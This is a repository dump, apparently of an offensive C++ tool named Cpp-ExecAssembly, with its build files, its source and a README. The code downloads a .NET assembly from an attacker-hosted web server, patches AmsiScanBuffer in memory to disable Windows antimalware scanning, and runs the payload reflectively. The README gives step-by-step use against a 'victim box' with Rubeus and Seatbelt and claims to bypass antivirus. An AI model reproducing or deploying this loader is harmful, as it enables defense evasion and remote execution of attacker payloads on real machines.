105 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106 |       <ConformanceMode>true</ConformanceMode>
107 |     </ClCompile>
108 |     <Link>
109 |       <SubSystem>Console</SubSystem>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <FunctionLevelLinking>true</FunctionLevelLinking>
117 |       <IntrinsicFunctions>true</IntrinsicFunctions>
118 |       <SDLCheck>true</SDLCheck>
119 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <ConformanceMode>true</ConformanceMode>
121 |     </ClCompile>
122 |     <Link>
123 |       <SubSystem>Console</SubSystem>
124 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
125 |       <OptimizeReferences>true</OptimizeReferences>
126 |       <GenerateDebugInformation>true</GenerateDebugInformation>
127 |     </Link>
128 |   </ItemDefinitionGroup>
129 |   <ItemGroup>
130 |     <ClCompile Include="DoHttpDownload.cpp" />
131 |     <ClCompile Include="DoReflectiveAssembly.cpp" />
132 |     <ClCompile Include="main.cpp" />
133 |     <ClCompile Include="Patch_AhEhmEssHee.cpp" />
134 |     <ClCompile Include="Utils.cpp" />
135 |   </ItemGroup>
136 |   <ItemGroup>
137 |     <ClInclude Include="Downloader.h" />
138 |     <ClInclude Include="ExecAssembly.h" />
139 |     <ClInclude Include="stdafx.h" />
140 |     <ClInclude Include="Utils.h" />
141 |   </ItemGroup>
142 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
143 |   <ImportGroup Label="ExtensionTargets">
144 |   </ImportGroup>
145 | </Project>


--------------------------------------------------------------------------------
/ExecAssembly/ExecAssembly.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="DoHttpDownload.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="main.cpp">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |     <ClCompile Include="DoReflectiveAssembly.cpp">
25 |       <Filter>Source Files</Filter>
26 |     </ClCompile>
27 |     <ClCompile Include="Utils.cpp">
28 |       <Filter>Source Files</Filter>
29 |     </ClCompile>
30 |     <ClCompile Include="Patch_AhEhmEssHee.cpp">
31 |       <Filter>Source Files</Filter>
32 |     </ClCompile>
33 |   </ItemGroup>
34 |   <ItemGroup>
35 |     <ClInclude Include="Downloader.h">
36 |       <Filter>Header Files</Filter>
37 |     </ClInclude>
38 |     <ClInclude Include="ExecAssembly.h">
39 |       <Filter>Header Files</Filter>
40 |     </ClInclude>
41 |     <ClInclude Include="stdafx.h">
42 |       <Filter>Header Files</Filter>
43 |     </ClInclude>
44 |     <ClInclude Include="Utils.h">
45 |       <Filter>Header Files</Filter>
46 |     </ClInclude>
47 |   </ItemGroup>
48 | </Project>


--------------------------------------------------------------------------------
/ExecAssembly/Patch_AhEhmEssHee.cpp:
--------------------------------------------------------------------------------
 1 | #include "ExecAssembly.h"
 2 | 
 3 | void PatchAhEhmEssHeeScanBuffer()
 4 | {
 5 |     HMODULE amsiDllHandle = ::LoadLibraryW(L"amsi.dll");
 6 |     FARPROC addr = ::GetProcAddress(amsiDllHandle, "AmsiScanBuffer");
 7 | 
 8 |     // https://rastamouse.me/blog/asb-bypass-pt3/
 9 |     char patch[6] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
10 | 
11 |     HANDLE processHandle = ::GetCurrentProcess();
12 | 
13 |     ::WriteProcessMemory(processHandle, addr, (PVOID)patch, (SIZE_T)6, (SIZE_T*)nullptr);
14 | }
15 | 


--------------------------------------------------------------------------------
/ExecAssembly/Utils.cpp:
--------------------------------------------------------------------------------
 1 | #include "Utils.h"
 2 | 
 3 | LPWSTR CstrToLpwstr(char* str)
 4 | {
 5 | 	wchar_t* tmp = new wchar_t[4096];
 6 | 
 7 | 	MultiByteToWideChar(CP_ACP, 0, str, -1, tmp, 4096);
 8 | 	return (tmp);
 9 | }
10 | 
11 | const char* drunk_strcpy(char* dest, const char* src)
12 | {
13 | 	int i;
14 | 
15 | 	i = 0;
16 | 	while (src[i] != '\0')
17 | 	{
18 | 		dest[i] = src[i];
19 | 		i++;
20 | 	}
21 | 	dest[i] = '\0';
22 | 	return (dest);
23 | }
24 | 


--------------------------------------------------------------------------------
/ExecAssembly/Utils.h:
--------------------------------------------------------------------------------
 1 | #ifndef UTILS_H
 2 | # define UTILS_H
 3 | 
 4 | # include <Windows.h>
 5 | 
 6 | LPWSTR CstrToLpwstr(char* str);
 7 | const char* drunk_strcpy(char* dest, const char* src);
 8 | 
 9 | #endif
10 | 


--------------------------------------------------------------------------------
/ExecAssembly/main.cpp:
--------------------------------------------------------------------------------
 1 | #include "ExecAssembly.h"
 2 | #include "Downloader.h"
 3 | #include "Utils.h"
 4 | 
 5 | unsigned char* rawData;
 6 | size_t rawDataLength;
 7 | 
 8 | int main(int argc, char ** argv)
 9 | {
10 |     std::vector<BYTE> res;
11 |     char** new_argv;
12 | 
13 |     // Download payload
14 |     res = DoHttpDownload(CstrToLpwstr(argv[1]), CstrToLpwstr(argv[2]));
15 |     rawData = &res[0];
16 |     rawDataLength = res.size();
17 | 
18 |     //Patch AMSI
19 |     PatchAhEhmEssHeeScanBuffer();
20 | 
21 |     // Trigger reflective loading
22 |     size_t tmplen;
23 |     new_argv = (char **)malloc(sizeof(char *) * (argc - 3));
24 |     for (int i = 0; i < (argc - 3); i++)
25 |     {
26 |         tmplen = strlen(argv[i + 3]);
27 |         new_argv[i] = (char *)malloc(tmplen + 1);
28 |         memset(new_argv[i], 0, tmplen + 1);
29 |         drunk_strcpy(new_argv[i], argv[i + 3]);
30 |     }
31 |     DoReflectiveAssembly(argc - 3, new_argv);
32 |     memset(rawData, 0, rawDataLength);
33 | 
34 |     return (0);
35 | }
36 | 


--------------------------------------------------------------------------------
/ExecAssembly/stdafx.h:
--------------------------------------------------------------------------------
 1 | #include <SDKDDKVer.h>
 2 | 
 3 | #include <stdio.h>
 4 | #include <tchar.h>
 5 | 
 6 | #include <metahost.h>
 7 | #pragma comment(lib, "MSCorEE.lib")
 8 | 
 9 | #import "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb" raw_interfaces_only \
10 |     high_property_prefixes("_get","_put","_putref")		\
11 |     rename("ReportEvent", "InteropServices_ReportEvent") \
12 |     auto_rename
13 | using namespace mscorlib;
14 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## Cpp-ExecAssembly
 2 | 
 3 | C++ tool load and execute assemblies in-memory, without triggering AV/EDR alerts.
 4 | 
 5 | ![](screens/assembly-1.png)
 6 | 
 7 | ## Usage
 8 | 
 9 | Compile in release mode
10 | 
11 | On your attack box, host your assemblies on a web server:
12 | ```bash
13 | $ ls -la /tmp/Assemblies
14 | total 1244
15 | drwxrwx--- 2 root root   4096 Mar  7 13:46 .
16 | drwxrwxrwt 1 root root   4096 Mar  7 13:27 ..
17 | -rw-r----- 1 root root 178688 Mar  7 13:46 Certify.exe
18 | -rw-r----- 1 root root 466432 Mar  7 13:27 Rubeus.exe
19 | -rw-r----- 1 root root 608256 Mar  7 13:27 Seatbelt.exe
20 | -rw-r----- 1 root root   4608 Mar  7 13:27 TestAssembly.exe
21 | 
22 | $ python3 -m http.server 80
23 | Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
24 | 
25 | ```
26 | 
27 | On the victim box, run the loader, specifying the following arguments:
28 | - argv[1] : attack box's HTTP host
29 | - argv[2] : HTTP path to the assembly
30 | - argv[2+X] : Assembly's argument 1
31 | - argv[2+X+1] : Assembly's argument 2
32 | - and so on ...
33 | 
34 | For instance :
35 | ```powershell
36 | PS> .\ExecAssembly.exe 192.168.57.1 /Assemblies/Seatbelt.exe       AntiVirus
37 |            ^                ^                  ^                       ^
38 |       /          \     /          \ /                      \ /                  \
39 |          ProgName       HTTP Host        Assembly path         Seatbelt's arg1
40 | 
41 | [+] InitMetaHost success
42 | [+] InitRuntime success
43 | [+] Runtime is loadable
44 | [+] InitInterface success
45 | [+] Runtime started
46 | [+] Opened Default Domain
47 | [+] Interface opened on Default Domain
48 | [+] InitAssemblyMemory success
49 | [+] Assembly loaded
50 | [+] Assembly's entry point parsed
51 | [+] Invocation success
52 | 
53 | 
54 |                         %&&@@@&&
55 |                         &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%
56 |                         &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
57 | %%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
58 | #%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
59 | #%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
60 | #####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
61 | #######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
62 | ###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
63 | #####%######################  %%%..                       @////(((&%%%%%%%################
64 |                         &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*
65 |                         &%%&&&%%%%%        v1.2.2         ,(((&%%%%%%%%%%%%%%%%%,
66 |                          #%%%%##,
67 | 
68 | 
69 | ====== AntiVirus ======
70 | 
71 |   Engine                         : Windows Defender
72 |   ProductEXE                     : windowsdefender://
73 |   ReportingEXE                   : %ProgramFiles%\Windows Defender\MsMpeng.exe
74 | 
75 | ```
76 | ## Community
77 | 
78 | Opening issues or pull requests very much welcome.
79 | Suggestions welcome as well.
80 | 
81 | ## Notes
82 | 
83 | This seems to bypass all AVs.
84 | However, this is not true for EDRs. Behevioural analysis will trigger alerts on good EDRs depending on what you are doing, even directly upon loading, as this program does not implement any evasion technique apart from AMSI bypass.
85 | 
86 | 


--------------------------------------------------------------------------------
/screens/assembly-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mallo-m/Cpp-ExecAssembly/aba83426be6881abb01d51ad34c4d303044bd09f/screens/assembly-1.png


--------------------------------------------------------------------------------
/screens/assembly-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mallo-m/Cpp-ExecAssembly/aba83426be6881abb01d51ad34c4d303044bd09f/screens/assembly-2.png


--------------------------------------------------------------------------------